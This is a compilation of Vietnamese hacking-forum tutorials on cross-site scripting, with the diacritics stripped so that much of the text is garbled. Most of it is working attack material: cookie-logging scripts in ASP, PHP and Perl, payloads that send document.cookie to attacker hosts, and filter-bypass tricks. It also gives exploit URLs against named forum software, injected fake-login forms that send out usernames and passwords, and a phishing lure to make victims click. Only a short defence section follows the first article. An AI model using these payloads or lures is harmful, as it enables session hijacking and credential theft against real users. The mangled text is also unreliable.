Authot: Mask_NBTA v Alex chan doi

y l nhng bi vit v XSS m ti su tm c, hy vng gip cc bn hiu hn 1 cht

v vn ny
Trc ht l bi vit ca Mask_NBTA

XSS c bn

Li xy ra nh th no ?

Li ny xy ra khi ng dng web thu nhn cc d liu nguy him c nhp t hacker .
Nh bn bit th 1 website thng cha cc link , thng qua cc link ny hacker c th
chn cc on code vo v khi ngi dng no s dng link ny th coi nh 99% l toi
mng , ni nm na l hacker c th thng qua li ny chn code vo site hay link
chm cc thng tin quan trng t nn nhn, cc thng tin quan trng y c th l
cookie hoc username + pass vo ti khon 1 ngn hng no sau thng tin ny
c gi ti cho hacker . Cch thng dng ca hacker l m ho cc phn nguy him
ca link ( chn code) thnh kiu HEX ( hoc c th l cc hnh thc khc ) lm cho
nn nhn t nghi ng khi click vo ci link nguy him . Sau l tm cch no
cho nn nhn chu click vo ci link t by , ci ny ty thuc vo s gian xo ca
tng hacker :-) , cng gian xo th cng mau ######ng thu c kt qu .

Hu ht cc ng dng web hin nay dng cookie kt hp 1 ti khon duy nht cho 1
ngi dng no , ngha l cookie ca ngi no ngi xi . Cc webmail , web bn
hng , nh bng , ... a s u dng cookie vi mc ch chng thc ngi dng , v y
cng l ci m hacker cn .

Vy ch chn code l chn ci qui g , dng ci g chn : dng Javascript ( thng
dng ) , VBscript , ActiveX, HTML,hoc Flash

Chc cc bn hiu s s v ci li ny ri :-) . Khng hiu th xem tip s hiu .

Bi gi chng ta s ni tht r v ci li ny :

Trc ht gii thiu s vi cc bn v cch m ho 1 s cc k t thng dng trong li
XSS ca thanh ADDRESS cht na khi b chong :

-------------------

V IBF Forum khng h tr table trong bi vit nn cc bn c th xem chi tit y bi
vit ti y : http://members.lycos.co.uk/masknbta/mask.rtf

--------------------
s s vy thi , mun bit ht th cc bn t kim .

KIM TRA LI XSS



By gi ti s nu ra cc bc cc bn c th kim tra xem site c b XSS hay
khng :

1 site bt k bao gi cng c 1 hoc tt c cc phn sau : search results, error messages ,
Web-form , ch yu li XSS nm cc phn ny , ni chung l XSS c th xy ra ch
no m ngi dng c th nhp d liu vo v sau s nhn c 1 ci g .

Cch tm li cho r rng th cc chuyn gia bo mt chia lm 7 bc nhng theo ti
nn chia thnh 5 bc :

Bc 1 : M website cn kim tra ( ci ny tt nhin ri )

Bc 2 : Bt u kim tra , nh v 1 tm kim hoc 1 login form v gi thng tin i
(nhp thng tin v nhn submit hay login hay ok g ) , v d nhp ch "Mask_NBTA"
chng hn hay ch g cng c .

Bc 3 : Xc nh kh nng site c b li XSS hay khng bng cch xem thng tin tr v
:

V d bn thy nh th ny :

"Your search for 'Mask_NBTA' did not find any items"

"Your search for 'Mask_NBTA' returned the following results"

"User 'Mask_NBTA' is not valid"

"Invalid login 'Mask_NBTA'"

hoc l ci qui g m c dnh ti ch "Mask_NBTA" m bn nhp vo ban u th
99% "Alert" ny bi XSS

cn vi hnh thc th na ti cng xin trnh by lun :

+ Ch cc input hay cc bin ngay trn thanh address ( var= ) thy my ci ny th c
nht d liu vo . Hy th vi nhng script ny :

< script>alert('Mask_NBTA')< /script>

hoc <i*g csstest=javascript:alert('Mask_NBTA')>

hoc &{alert('Mask_NBTA')};



Bc 4 : Chn code thc s vo ni b li :

chn ci ny < script>alert('Mask_NBTA')< /script> vo ban ny v nhn SUBMIT .
Nu sau bn nhn c 1 popup c ch "Mask_NBTA" th "Alert" ny 100% b dnh
XSS . Nhng xin ch , thnh thong vn c trng hp website b dnh XSS nhng
vn khng xut hin ci popup th buc lng bn phi VIEW SOURCES (m bng) n ra
xem . Khi view sources nh kim dng ny< script>alert('Mask_NBTA')< /script> ,
nu c th ht chy , XSS y ri .

Mt v d khc thng gp hn :

Gi http://sitebiloi.com/ l site b dnh li XSS v ta tm c ni b li nh th ny :
http://sitebiloi.com/index.php?page=<s...< script> , ngha l ta c th chn code ngay trn
thanh ADDRESS .

Ti khng th trnh by ht mi tnh hung c , ci m cc bn cn l hiu ra vn
th bn s hiu c khi no b li .


KHAI THC

Kim tra li xong by gi phi tm cch khai thc li t c nhng g ta mong
mun :

Ti s trnh by cch thng qua li XSS ly cookie ca nn nhn :

Bc 1 : to 1 file cookie.asp c ni dung nh th ny :

----------------------------------------------------------------------------

<%

Set x = CreateObject("Scripting.FileSystemObject")

Set y = x.OpenTextFile(Server.MapPath("mask.txt"), 8, true)

y.WriteLine Request.QueryString("cookie")

y.Close

Set y = Nothing

Set x = Nothing

%>
-------------------------------------------------------------------------------

hoc file cookie.php nh th ny :

//////////////////////////////////////////////////////////////////////////////

<?

$f = fopen("mask.txt","a");

fputs($f, $cook.chr(13));

fclose($f);

?>
////////////////////////////////////////////////////////////////////////////////

v upload file ny ln host ca bn . Ch l nu bn dng file .php th phi up ln host
h tr PHP (lycos) , dng file .asp th up ln host h tr ASP (brinkster)

Bc 2 :

ly li v d site b XSS trn thanh address , ly cookie ca nn nhn ta lm nh th
ny :

http://sitebiloi.com/index.php?page=<s...< /script>
th ngay lp tc on code c chn vo trong web page , v trng nh vy :

-----------------------------------------------------------

<HTML>
<TITLE> Hello all! </TITLE>
hello

<
script>window.open("http://www.hostbanupfile.com/cookie.asp?cookie="+document.coo
kie)< /script>
...

</HTML>
--------------------------------------------------------------

Vi on code ny th trnh duyt s thi hnh on code v sau s gi ton b cookie
ti cho bn dng file .txt v bn ch vic m file ny ra xem .

Nhng khng phi lc no bn cng c th d dng chn code , lm lc cng phi linh
hot 1 cht bi v ngi lp trnh website cng u th no d dng cho chng ta lng
hnh nh vy , h cng c chiu ngn cn chng ta , cch h dng l "Lc code"
(Anti-XSS Filter) . C ch ca h nh sau : b lc ny s loi b cc k t c bit m
ngi dng nhp vo , n gin vy thi .

Chng l hacker chu b tay , cha chc ! Hacker cng c gng vt qua "b lc" bng
mt vi th thut nh :

1/ Nu "B lc" loi b 2 k t "<" v ">" :

Hacker s dng "\x3c" v "\x3e" thay th v bt u chn code vi ') +

') + '\x3cscript
src=ht*p://hostbanupfile.com/cookie.asp?cookie="+document.cookie\x3e\x3c/script\x3e'


2/Bin cc on code nguy him thnh li ch gii (comment) :

V d khi hacker nhp vo < script>code< /script> th s b chn nh sau :

<COMMENT>
<!--
code (khng c phn tch bi b lc)
//-->
</COMMENT>

Vt qua ci ny cng rt d bng cch dng th ng </COMMENT> ng ci
<COMMENT> kia . Ngha l ta chn ci ny vo :

< script>

</COMMENT>
<img src="http://none" onerror="alert(Mask_NBTA was here);window.open(
http://sitebanupfile.com/cookie.asp?cookie...cument.cookie); ">
< /script>

lc ny on lc code ban u tr thnh :

-----------------------------------------------------------------------

<COMMENT>

</COMMENT>

< /script>
</COMMENT>

--------------------------------------------------------------

v th l b lc b v hiu ho 1 cch nhanh ######ng .

Ci ny dng hack webmail bng cch to fakelogin th khi ch .

3/Khng cho JAVASCRIPT tn ti :

Trong trng hp ny th hu ht cc k t t bit c nhp vo t ngi dng u b
lc , do vt qua th hacker phi m ho code nhp vo :

Ht*p://sitebiloi.com/search.cgi?query=%26%7balert%28%27Mask %27%29%7d%3b

Chui "%26%7balert%28%27Mask%27%29%7d%3b" chnh l {alert('Mask')}; c
m ho



Ti nu thm ra vi v d na cc bn d hnh dung :

*Forum YABB GOLD 1 SP1 (cha fix) , b XSS nh sau :

ht*p://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269<
script>location%3d'Ht*p://www.hostbanupfile.com/cookie.php?Cookie%3d'%2b(docum
ent.cookie)%3b< /script>
, my ci k t long ngong bi gi s dng ri (t tra nh )



*Forum vbullettin (version bao nhiu qun ri ) :

ht*p://target.com/board/usercp.php?s=[Session ID]">< script>javascript-
:document.write('<img
scr=h*tp://www.hostbanupfile.com/cookie.asp?cookie='+escape(document.cookie)+'>');<
/script>



*Forum PHPBB 1.4.4 (hnh nh 2.0 cng b) :

vo ng k 1 ci acc , sau send 1 ci topic , rng lm sao "Alert" admin n c
ng cn chm cookie ca n ch , ti gi nh

----------------------------------------------------------------------------------------------

Subject : ADMIN , I LOVE U

Ni dung :

your forum is bad, hahaha

[img]javascript:document.write('')[/i*g]

--------------------------------------------------------------------------------

ta thc hin c l do li dng th img chn code . Khi "Alert" admin c ci topic
ny th cookie ca n lp tc bay vo tay ta . H h !

Cch dng cookie va chm c :

i vi WIN XP th cookie c lu tr ti : C:\Documents and Settings\tn ca
bn\cookies\

cn cookie no , chnh xc ti u th vo m kim , khng th bit c th c .

Kim c ri th thay th ci cookie ca ta thnh ci va chm c , xong tr li forum
vi cookie ny th ta l admin . Nhng hnh nh nu ta chm cookie m "Alert" admin n
log out mt tiu th cookie ny coi nh v dng , ch p dng c khi "Alert" admin ko
log out ( khng bit ti nh c chnh xc hay khng nhng i loi c l ng )

Cn rt nhiu rt nhiu site + forum b li trn net , y ch l vi ba v d cc bn d
hnh dung .


Cch d d victim vo ng ci link m ta mong mun :

mang tnh thc t v d hiu ti s k cho cc bn nghe 1 cu chuyn v hack bng li
XSS v y cng l 1 tnh hung na ca li XSS :

Mt hm bun i ti lang thang trn net v vo 1 website n , v d l
http://www.a.com/ theo thi quen ti nh 1 d liu bt k vo put in USERNAME , v
y ci m ti ng vo l Mask_NBTA ti lin thy xut hin dng ch "Invalid login
: user Mask_NBTA is not found in our data" , h h 1 triu chng ca XSS y ri , nhn
vo thanh URL li thy ci ny
http://www.a.com/login.asp?erro=Invalid%20...in%20our%20data

qu sng ri cn g , cng vic bi gi lm sao hack y . u tin ti save as ci
trang ny vo da cng , dng NOTE PAD open v xem ci sources .Ti sao ti lm vy ?
V ti mun bit 2 ci tn bin ca login form , v ti d dng tm thy , n l "ten" v
"matkhau" , da vo 2 ci ny th ti bit mnh cn phi lm g , v phi chn code
nh th no h h . Ci ti mun lc ny l lm sao da vo XSS ly c thng tin
v username + pass ca nn nhn . Vy th mnh chn ci g y , sau 1 thong suy ngh
ti quyt nh chn ci ny y :

</FORM>
<FORM action="fakelogin.asp" method="post"

onsubmit="

image= new Image;

image.scr='h*tp://myhost/cookie.asp?cookie='+document.form(1).ten.value + '/' +
document.form(1).matkhau.value;">


Ti s gii thch tng ci cho cc bn hiu :

ci </FORM> kt thc ci FORM ca ci site c m ra trn . Cn ci code bn
di th nhn thi chc cc bn cng hiu ht , khng cn gii thch nh .

Chn code nh sau :

Ht*p://www.a.com/login.asp?tnbin1=gitrctht1&tnbin2=gitrctht2&tnbin3=
gitrctht3&tnbin4=gitrctht4&erro=%3C/FORM%3E%3CFORM%20action=%2
2login1.asp%22%20method=%22post%22%20onsubmit=%22image%20=%20New%20i
mage;image.scr='h*tp://myhost/cookie.asp?cookie='%20%2bdocument.form(1).ten.value
%20%2b'/'%20%2bdocument.form(1).matkhau.value;%22%2E

Ti sao li chn thm 1 ng bin c tht vo, nh l lm sao nhn vo URL ta ko thy
ci phn code chn thm ngoi sau , ch yu l lm cho ci link thm di long ngong
trc ht lm hoa mt nn nhn , sau l to dng v c tht 1 cch t nhin cho ci
link .

Lm ti y ti cht ngh ra mnh c "Alert" bn l member ca ci site ny , sn ang
rnh ri chc n chi . Cch ti lm l send cho n 1 ci mail vi ni dung th ny :

My nghe tin g mi cha ! WEBSITE a.com m 1 cuc thi c tin thng l 1000 000 ,
li ng s trng ca my na , cn hng bit tham gia na . Xem ci link ny my s
hiu :

H*tp://www.a.com/login.asp nhng bn di ci link ny s l ci
http://www.a.com/login.asp?tnbin1=gi..au.value;%22%2E

Bn on xem chuyn g xy ra . Tt nhin l n s click vo ci link tng chng nh
v hi , sau login vo site bnh thng m u ng l ci username + pass b
...........

Cng vic ca ti ch l vo host , m ci file log ra v xem , c g trong , b mt
..........

Cu chuyn ti y l ht . Chc cc bn cng hiu cch lm ca ti , hy vng vi
nhng ci u thin ti ca cc bn th s c nhng cch hay hn cch ti va trnh by .



CCH PHNG CHNG XSS :

1/Trc ht l cho admin ca cc website :

+ Khng cho php bt c HTML tag no nhp vo t ngi dng .

+ Lc tt c cc Active Script t HTML Code

2/Dnh cho ngi dng :

Cn thn l trn ht , ng cht v thiu hiu bit .

Ti vit bi trc ht l n li kin thc cho chnh mnh sau l mun gii thch cho
cc bn hiu tht r v nguy hi ca XSS m phng trnh .


Cross-Site Scripting (ko nh tc gi)

Gii thiu :

Bn bao nhiu ln nhn mt email m cha cc hyperlink ri ?Th ngh xem khi bn
nhn c 1 mail link ti site m bn tham gia vi li mi cho kh ngt , ban click vo
link m ko cht thc mc , login vi user ca mnh .... nh vy rt c th l bn mt
pass vo tay mt hacker ri y ch l 1 vd nh v cross-site scripting thi .

Cross-Site Scripting

Cross-Site Scripting cn gi l XSS , li xy ra khi cc ng dng web thu nhn cc d
liu nguy him ca cc hacker nh mt on m javascript ,Vbscript.... N s ch gip
bn ly c thng tin mt ca mt ng dng web thi , ko hn ko km ( v bn hy
qun ngay vic ngh rng khai thc thnh cng li ny ch mt vi pht nh )

XSS c kh nng nh hng ti cc site cho php ngi dng nhp d liu vo ,thng l
:

Cc cng c tm kim
Forms c in bi user
Web message boards, guestbook
Mt hacker khi pht hin ra li XSS s c gng dng n ly cookies, to cc trang
login gi ly pass ca ngi khc ..v..v..

By gi chng ta bt u i su vo li XSS , trc tin l xc nh site dnh li ny :

V d mt cng c tm kim ca site sau khi c ta nhp gi tr ( v d : XSS ) n s tr
v nhng g m ta va nhp ( tc in ra XSS ) th rt c kh nng n b dnh XSS . By gi
ta view source ca site y nu tm thy " XSS " th ch th site ny dnh li ri , h h

m phng mt cuc tn cng bng XSS , mt site ngn hng online c creat (
www.freebank.com ). Trc tin hacker s bt u tm mt trang trn site ny c th
nhp gi tr , trong v d hacker tm ra rng khi c gng login ko c th username s
hin ln trn thanh URL nh sau :
http://www.freebank.com/banklogin.asp?err=Invalid%20Login:%20Badlogin (%20 l
cc k t trng )

tip theo , hacker s kim tra xem c th tim m HTML v javascript vo trang wweb
ny c ko . n gin ch cn thay "Invalid%20Login:%20Badlogin " URL trn bng
<script>alert('XSS')</script> , nu sau ta nhn c 1 ca s pop-up vi thng bo
XSS th ta hon ton c th khai thc site ny qua li XSS . Anh ta by gi phi to 1
URL c th ly c cc thng tin nhy cm . to c 1 URL m c kh nng
qua mt c nhiu ngi th hacker phi m sourrce ca trang web ( m c th y l
trang banklogin.asp ) a vo URL ph hp:
y hacker s thm vo on code sau ( ty tng trng hp c th m ta c th thay
bng code khc )

</form>

<form action="login.asp" method="post"

onsubmit="XSSimage= new Image;
XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms(
1).password.value;">

khi c " tim " vo trang login th n s nh sau : ( on code ca chng ta c in
nghing )

<table>

<tr>

<td bgcolor="#2E7AA3" Style="border:1px solid black " WIDTH ="258"
HEIGHT="217>

<form action="login.asp" method="post>

<center>

</form>

<form action="login.asp" method="post"

onsubmit="XSSimage= new Image;
XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms(
1).password.value;">

<br> Username :<br><input type ="text" name ="login" style="border: 1px solid black;
spacing :0"><br>Password:<br>

............................

Nh ta thy , on code c "tim " vo gm 2 phn chnh , mt l </form> kt thc
<form> ca bn gc , hai l

<form action="login.asp" method="post"

onsubmit="XSSimage= new Image;
XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms(
1).password.value;">

Ch rng <form action="login.asp" method="post" ko h khc bn gc tuy nhin ta
thm vo onsubmit , n c tc dng l chy on javascript khi victim click vo submit.
Thng tin ca victim s gi n link trn (www.hacker.com )

Sau khi c c code ri , by gi hacker s phi a n vo URL :
http://www.freebank.com/banklogin.asp?serviceName=FreebanlCaastAccess&templateN
ame=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.
com&err=%3C%2Fform%3E%0D%0A%3Cform+action%3D%22login.asp%22+method
%3D%22post%22%0D%0Aonsubmit%3D%22XSSimage%3D+new+Image%3B+XSSi
mage.src%3D%27http%3A%2F%2Fhacker.com%2F%27%2Bdocument.forms%281%29
.login.value%2B%27%3A%27%2Bdocument.forms%281%29.password.value%3B%22
%3E%0D%0A

D nhn ra l URL ny khc vi URL m ta dng test XSS , n gin ch v nh th
ny URL s di gim s nghi ng ca victim thi.

Ri , by gi ta s gi link ny n cho victim , c rt nhu cch qua mt h sau ch
vic ch v check log file ti

www. hacker.com

Trn y ch l 1 v d nho nh thi bng sng to ca mi ngi s c 1 cch khai thc
ring cho mnh Cc bn ko ch c th ly user v pass ca ngi khc m cn c th thay
i gi tr ca sn phm ti 1 site mua bn , thm d liu ..v..v..v ..

Hi vong bi vit ny c th gip cc bn newbie nh mnh phn no hiu thm v XSS .
vi cc bn cha bit XSS l g sau khi c xong bi ny th cc bn c li bi ca anh
Mask_NBTA_83 .Bi y s gip ch nhiu y .

Khi no kim thm bi v XSS mnh s c vt 1 bi na nu ko ai thy phin h h



bi trn mnh ni qua v li XSS v cch khai thc ca n hn cc bn cn nh on
javascript m hacker s s dng ly coookie ca victim ch (c ko t nhng mnh xin
ch ra v d sau )
<script>document.location.repleace('http://hacker/payload?c=' + document.cookie )
</script>

file php ghi li coookie c s nh sau :

<?php

$f = fopen ("log.txt", "a");

fwrite($, "IP : { $_SERVER ['REMOTE_ADDR']} Ref: {$_SERVER
['HTTP_REFERER']} Cookie: {$HTTP_GET_VARS ['c'] }\n");

fclose($f);

?>

Hay y l 1 v d khc :

<script>document.location.repleace('http://hacker/steal.cgi?' + document.cookie )
;</script>

v y l source ca file steal.cgi :
#! /usr/bin/perl

#steal.cgi by David Endler

#Specific to your system

$mailprog = '/usr/sbin/sendmail';

#creat log file

open (COOKIES,">>stolen_cookie_file");

#what victim see

print " Content-type: text /html \n\n";

print <<EndOfHTML;

<html><head><title>Cookie stealing </title></head>

<body> your cookie has been stolen hehe
</body>

EndOfHTML

#The QUERY_STRING enviroment variable should be filled with

#the cookie text after steal.cgi:

#http://www.hacker.com/steal.cgi?XXXXXXX

print COOKIES "$ENV{ ' QUERY_STRING ' } from $ENV { ' REMOTE_ADDR'} \n;

#now mail the alert as well so we can start hijack

open (MAIL,"|$mailprog -t");

print MAIL " To: hacker\ @hacker.com \n";

print MAIL " From: cookie_steal \ @hacker.com \n";

print MAIL " Subject :Stolen cookie \n\n";

print MAIL "-" x 75 . "\n\n;

print MAIL "$ENV{ 'QUERY_STRING'} from $ENV{ 'REMOTE_ADDR'} \n";

close (MAIL);

Mt v d khc na ( ca matrix2k )

<script>window.open("http://www.hostbanupfile.com/cookie.asp?cookie="+document.c
ookie)</script>

file cookie.asp:

<%
Set bien = CreateObject("Scripting.FileSystemObject")
Set taobien = bien.OpenTextFile(Server.MapPath("xss.txt"), 8, true)
taobien.WriteLine Request.QueryString("cookie")
taobien.Close
Set taobien = Nothing
Set bien = Nothing
%>